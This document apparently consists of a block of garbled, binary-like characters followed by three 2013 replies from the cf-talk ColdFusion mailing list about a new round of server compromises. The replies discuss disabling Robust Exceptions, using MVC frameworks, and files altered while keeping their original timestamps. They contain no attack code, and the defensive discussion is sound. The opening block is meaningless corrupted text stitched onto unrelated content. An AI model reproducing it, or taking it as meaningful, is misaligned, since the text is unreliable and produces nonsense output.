9®FóÂBWQÉl0ÊÃÃvñÂÂóÃ\¸ÿê¬Â©Ã´Â³Â¥pEßµÃ/ WHÂq²¦¹ÿÃomÃòÂÂWó§ÂÂYªÃå«#}yµ'XÂéâ¡[V8cà I¼ÂLÂdӽóývöÂæalW][÷* 0ÂI ÂÂñ}_p6R¯ ]Ãî®lÂXFLõR±, ZqÙZTgW¥åÂø[Â\ f´qêWÃçåöby©Eà ¦¨Y0 FãÂ4Â÷ÃzèԶA¢׻áº8'¹ïVÂcKW4ðGTê¤+·:5IYÂ4)ÃHmûÂ=Oѱì{E Ã2ͼ¿%V#Â6ÂÃ7à ~Ãëô^Â'Ã\¸ÿê¬Â©Ã´Â³Â¥pEßµÃ/¼tmAZmÂgäi£Ãm6lüÂÂÂæalW][÷* b²?Ãà r;Âñ}_ÃÃ6wÃuÃdî®lÂXFLõR±, ûÂýzÂ.Âi½$þÂ*j9 '¨ÂÂWó§ÂÂYªÃå«#}yµ'XÂÎQ¿(Õ¾Â÷ÂåئfTm{$5fIHpOÃÃjr$¿ÃÃÃûI£ä£G ërÂÂ}Ã+DÂÂWó§ÂÂYªÃå«#}yµ'X{±ñévøTùdv§òi¦fTm{$5fIHpOÃÃî¯Tȯûk.1 L½ð¹ÂÂWó§ÂÂYªÃå«#}yµ'X:6ôԸT¼/*²-¦fTm{$5fIHpOÕ²;Ã70yÃ\^«årÂÂr2þOTWÃçåöby©Eà ¦¨Y5 wÂÃÙ ÃóìyÃU2׻áº8'¹ïVÂcKWýº²´Â ?:5IYÂ4)Ä^(·:;hÂæalW][÷* ÂE3 )¨hkeF²ÃdÂ1OOåò î®lÂXFLõR±, ÂYòÂÃ[cà ûäéÂÿ¿C|ÃÃqÂæalW][÷* Ã(Ãõ#|Q »s7EHÂèyvà ²Ãaî®lÂXFLõR±,
Re: New Round of Exploits going on
One thing I hate about some hosting companies is that they have Robust Exceptions switched on, but what concerns me even more is that they don't care that this is a security risk... If your hosting company is one of them, get in their ears about having it switched off. If they refuse then its time for a change. Also as a caution not a rule, if your lucky enough to have the time, look into using any framework that supports MVC and SES rewrites, this has stopped them in their tracks as they are not able to run the uploaded code. Not with ease at least anyway. Still I am not sure how they are uploading these files, as there is nothing in the logs that indicates this. I am guessing that something else on the server is compromised and because they are able to and do look for exceptions being displayed to the screen they now know where to start spreading their malware. My guess is there is an exploit still know and not public that is bypassing all sand boxing at the moment. -- Regards, Andrew Scott WebSite: http://www.andyscott.id.au/ Google+: http://plus.google.com/113032480415921517411 ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354445 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: New Round of Exploits going on
Still I am not sure how they are uploading these files as there is nothing in the logs that indicates this. For mine in the previous message, the altered file still had the ORIGINAL creation date on it - 2011 something - although it was altered last week. So, a search of all the site files for anything recently altered showed nothing. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354446 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: New Round of Exploits going on
That would indicate that they where able to get the file stamp before modifying it and reapplying the time stamp Extreme long shot, but who knows how they are doing this. -- Regards, Andrew Scott WebSite: http://www.andyscott.id.au/ Google+: http://plus.google.com/113032480415921517411 On Mon, Feb 11, 2013 at 4:43 PM, Les Mizzell lesm...@bellsouth.net wrote: Still I am not sure how they are uploading these files as there is nothing in the logs that indicates this. For mine in the previous message, the altered file still had the ORIGINAL creation date on it - 2011 something - although it was altered last week. So, a search of all the site files for anything recently altered showed nothing. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354447 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm